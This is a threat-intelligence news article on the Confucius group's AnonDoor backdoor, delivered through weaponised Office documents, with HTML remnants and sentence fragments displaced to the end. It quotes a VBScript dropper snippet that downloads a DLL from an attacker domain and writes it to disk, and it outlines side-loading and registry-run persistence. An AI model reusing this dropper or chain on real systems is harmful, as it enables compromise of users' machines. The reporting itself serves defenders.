The Confucius hacker group, active since 2013, has recently escalated its operations by weaponizing malicious Office documents to compromise Windows endpoints with a new Python-based backdoor, dubbed AnonDoor<\/strong>.<\/p>\n Historically known for deploying document stealers such as WooperStealer, the threat actor has now shifted to a sophisticated multi-stage infection chain that leverages OLE-embedded scripts, VBScript droppers, PowerShell<\/a> loaders, and scheduled tasks to achieve persistence and evade detection.<\/p>\n This evolution underscores the group\u2019s commitment to refining its tradecraft and targeting high-value information across government and defense organizations in South Asia.<\/p>\n Initial access is most commonly achieved through spear-phishing campaigns that deliver corrupted PPSX or DOCX attachments.<\/p>\n When unsuspecting users open these documents, they encounter a \u201cCorrupted Page\u201d prompt that conceals an embedded OLE object.<\/p>\n This object triggers a background fetch of a secondary document, mango44NX.doc, from a remote server.<\/p>\n Fortinet researchers noted<\/a> that the CMD stub within slide1.xml.rels initiates a VBScript dropper hosted at greenxeonsr.info, marking the first deployment of AnonDoor in this campaign.<\/p>\n Upon execution, the VBScript dropper performs the following steps: it creates an MSXML2.XMLHTTP object to download a raw DLL payload, writes the binary to The dropper also copies a legitimate executable to This strategy not only conceals the malicious binary within trusted processes but also provides robust persistence<\/a> without generating conspicuous artifacts.<\/p>\n The infection mechanism centers on leveraging a malicious Office payload to seamlessly introduce AnonDoor.<\/p>\n First, the document\u2019s OLE object references an external VBScript<\/a> hosted on greenxeonsr.info.<\/p>\n The script snippet below illustrates how the dropper leverages ADODB.Stream to save the downloaded bytes as a DLL:-<\/p>\n Once the DLL is in place, the dropper invokes a reconstructed The DLL subsequently reaches out to multiple C2 domains\u2014cornfieldblue.info and hauntedfishtree.info\u2014to retrieve further payloads, including the WooperStealer module and additional configuration files.<\/p>\n This multi-layered approach ensures that even if one stage is detected, subsequent payloads can be dynamically fetched, analyzed, and replaced, complicating forensic investigations.<\/p>\n By chaining document-based exploitation with obfuscated scripting and DLL side-loading<\/a>, Confucius demonstrates advanced operational security and resilience against endpoint defenses.<\/p>\n Defensive teams should prioritize monitoring for anomalous OLE object behaviour, unexpected registry modifications, and unusual DLL loads within Office processes.<\/p>\n Integrating heuristics that detect atypical stream writes to user directories and enforcing strict network segmentation can help mitigate this emerging threat.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a><\/strong>.<\/p>\n The post Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj30TSvdjHK9CHFXffkHeBytBQbtDACQ0CLF7CeklwesKa8jBV5JTsgQMe9KhK5mrwR4DI1ljgagJs_xylmVcwMLVqJfpwYx3AQ0SObklf6fU7jSi_rxKFqSGpQDY6yUSF4akssnP0FvgK5X5s_CpaUvLymKYHbGk15PKjKD0XatNnK0Ch7qRWswnydfGg\/s16000\/Confucius%25E2%2580%2599%2520activities%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\")
%LocalAppData%Mapistub.dll<\/code>, and then stages execution via DLL side-loading.<\/p>\n%AppData%Swom.exe<\/code> and writes a registry key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun<\/code> to ensure the side-loaded DLL is launched on each login.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlf-HuMOFor-Uk4d7uLv4yLAPAVQ8Ot1t3zJpyXKGJnIAmT6r8I-bsFrj0tZkQoODSWLU6wj7q2DdUQX_5T1syAVNut73PMabuwxLRks3x6jP2tIBrr_We3RNMRvWj1eMWxya819w5iPz3S8PCnUy582PryPnojOGUTLiy89wvahXKmMVUnQr71ubTG-g\/s16000\/Download%2520DLL%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\")
Infection Mechanism<\/strong><\/h2>\n
Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nobjXMLHTTP.Open \"GET\", \"https:\/\/greenxeonsr.info\/Jsdfwejhrg.rko\", False\nobjXMLHTTP.Send\nSet objStream = CreateObject(\"ADODB.Stream\")\nobjStream.Type = 1 ' Binary\nobjStream.Open\nobjStream.Write objXMLHTTP.responseBody\nobjStream.SaveToFile WScript.Network.UserName & \"Mapistub.dll\", 2\nobjStream.Close<\/code><\/pre>\nShellExecute<\/code> call to launch Swom.exe<\/code>, which side-loads the DLL into memory.<\/p>\n